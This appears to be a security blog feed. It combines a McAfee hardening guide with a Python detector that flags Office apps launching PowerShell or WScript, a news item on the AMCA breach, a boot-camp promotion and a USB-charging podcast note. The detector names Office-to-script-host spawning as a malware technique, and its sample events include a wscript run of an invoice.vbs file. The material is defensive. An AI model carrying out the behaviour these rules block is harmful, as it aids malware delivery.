  • Disabling Registry Editor and Task Manager — Certain malware may attempt to disable the Task Manager to prevent the user from terminating the malicious process. Enable this AP rule to prevent the Task Manager from being disabled.

6. Access Protection (AP) rules for virus and worm outbreaks

These rules should only be enabled during a virus outbreak and for workstations only. Implementing the last two shown below may cause issues with file servers running McAfee VirusScan Enterprise or McAfee Endpoint Security. Always test these rules before you enable them:

  • Remotely Creating Autorun Files
  • Remotely Creating or Modifying Files or Folders
  • Remotely Accessing Local Files or Folders

NOTE: Only create a separate AP policy for workstations if you wish to continue using the AP rules below. Remotely creating files between workstations is unusual behavior.

7. User-defined AP file/folder path locations

The user-defined rule below is one common location for malware.

8. Microsoft Office malware

Most threats come through email and are often downloaders for other malware. The AP rule below is intended to prevent Microsoft Office applications from executing PowerShell. You can include CScript.exe and WScript.exe as well.

9. McAfee Endpoint Security firewall

Almost all organizations have a firewall at the perimeter level. Some may opt to disable the built-in firewall on workstations and servers. The McAfee Endpoint Security Firewall is more comprehensive than the Windows firewall and can be used to prevent communication to malicious IPs and domains.

10. Blocking malicious traffic with the firewall

Blocking malicious network traffic prevents new variants from being downloaded and can minimize the impact on the environment. Environments that don’t block malicious traffic as one of the first steps often take longer to clean up.
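As an added example rather than McAfee's own code, the following Python script expresses the intent of the Office-to-PowerShell Access Protection rule from step 8 as detection logic over process-creation events, so you can check an EDR or Sysmon export for the same behaviour the rule blocks. The pipe-delimited event format, hostnames and sample lines are constructed for this example.

```python
"""Flag Microsoft Office applications spawning script interpreters.

Added example (not McAfee's code): mirrors the Access Protection rule
"prevent Microsoft Office applications from executing PowerShell", with
CScript.exe and WScript.exe optionally included, as detection logic over
process-creation events. The event format, hostnames and sample lines are
constructed; adapt parse_event() to your own EDR or Sysmon export.
"""
import ntpath
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Office parents the rule is meant to cover (basenames, compared case-insensitively).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts named in the guidance: PowerShell, plus CScript/WScript as the optional extension.
POWERSHELL = {"powershell.exe"}
SCRIPT_HOSTS = POWERSHELL | {"cscript.exe", "wscript.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    ts: str
    host: str
    parent_image: str
    image: str
    cmdline: str


def basename(path: str) -> str:
    # ntpath handles Windows separators even when this script runs on Linux/macOS.
    return ntpath.basename(path).lower()


def parse_event(line: str) -> ProcessEvent:
    # Constructed format: ts|host|parent_image|image|cmdline (cmdline itself may contain '|').
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        raise ValueError(f"malformed event: {line!r}")
    return ProcessEvent(*parts)


def is_office_script_spawn(ev: ProcessEvent, include_cscript_wscript: bool = True) -> bool:
    """True when an Office process launched PowerShell (or CScript/WScript when enabled)."""
    children = SCRIPT_HOSTS if include_cscript_wscript else POWERSHELL
    return basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in children


def find_hits(lines: Iterable[str], include_cscript_wscript: bool = True) -> List[ProcessEvent]:
    """Return the events that would have been blocked by the rule."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_office_script_spawn(ev, include_cscript_wscript):
            hits.append(ev)
    return hits


def summarize(hits: Iterable[ProcessEvent]) -> Dict[str, int]:
    """Hits per host, useful for spotting a machine that repeatedly trips the rule."""
    return dict(Counter(ev.host for ev in hits))


# Constructed sample events: two should trip the rule, three are ordinary activity.
SAMPLE_EVENTS = [
    r"2019-06-13T09:12:03Z|WS-0142|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -Command [constructed placeholder]",
    r"2019-06-13T09:15:44Z|WS-0142|C:\Windows\explorer.exe"
    r"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe",
    r"2019-06-13T10:02:17Z|WS-0311|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\alice\AppData\Local\Temp\invoice.vbs",
    r"2019-06-13T10:03:05Z|WS-0311|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|C:\Windows\splwow64.exe|splwow64.exe 12288",
    r"2019-06-13T10:40:51Z|WS-0098|C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
    r"|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|WINWORD.EXE /n",
]

if __name__ == "__main__":
    hits = find_hits(SAMPLE_EVENTS)
    for ev in hits:
        print(f"{ev.ts} {ev.host}: {basename(ev.parent_image)} -> {basename(ev.image)} :: {ev.cmdline}")
    print("hits per host:", summarize(hits))
```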

The post Leveraging McAfee Endpoint Security to Protect Against Emotet and Other Malware appeared first on McAfee Blogs.

AGs Warn ACMA Breach Impact Rose to over 20 Million

After the data of more than 20 million patients was potentially exposed during the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorneys general (AGs) in states such as New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party breach affected Quest Diagnostics and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

Win the war against cyber crime with our cyber security boot camp

Cyber attacks are stronger and more prevalent than ever, wearing organisations down until attackers locate and exploit points of weakness.

For most organisations, it’s only a matter of time before the enemy breaches their defences. And with the cost of data breaches soaring and the potential for large fines under the GDPR (General Data Protection Regulation), you need to be prepared to fight back.

You can gain the necessary skills and learn the right tactics to lead your organisation’s charge by enlisting in our five-week boot camp.

As part of your training regimen, you’ll receive weekly emails describing the steps you must take to secure your organisation and repel enemy forces. They will instruct you on how to:

  1. Cover the basics

Your first task will be to shield your organisation against the most urgent threats with the help of the Cyber Essentials scheme. Backed by the UK government, the scheme identifies a small set of essential controls that address the majority of common weaknesses.

  2. Drill your troops

Help your employees understand the threats they face with regular staff awareness training. An effective training course will help them navigate threats more carefully, avoiding costly mistakes and handling incidents appropriately.

  3. Identify your weaknesses

Do your defences work as intended? You don’t want to wait until you come under attack to find out. That’s why you need to appoint someone who will view your defences the way an attacker would, identifying areas that can be exploited.

  4. Guard your critical assets

Perimeter defences aren’t enough when it comes to your most sensitive data. You must therefore review the risks to your critical assets and develop policies and processes to ensure someone is always keeping an eye on them.

  5. Fortify your processes

So far, so good, but now isn’t the time to get complacent. Attackers will keep coming back, armed with the knowledge of their previous battles. That’s why you must regularly review and update your defence strategy to stay one step ahead of the enemy.

Are you ready to fight back?

You can find out more about our strategy for defending your organisation by enlisting in our boot camp.

Those who sign up will receive a free copy of The Cyber Security Combat Plan, as well as weekly emails containing in-depth advice on how to complete each task.

The post Win the war against cyber crime with our cyber security boot camp appeared first on IT Governance Blog.

Episode 514 – Avoid Those Free USB Charging Hubs

As you travel you may come across free charging stations for your mobile devices, with USB cables ready to go. This episode talks about why you should think twice before using them: a USB cable carries data as well as power, so a charging port you do not control can talk to your device. Be aware, be safe.

The post Episode 514 – Avoid Those Free USB Charging Hubs appeared first on Security In Five.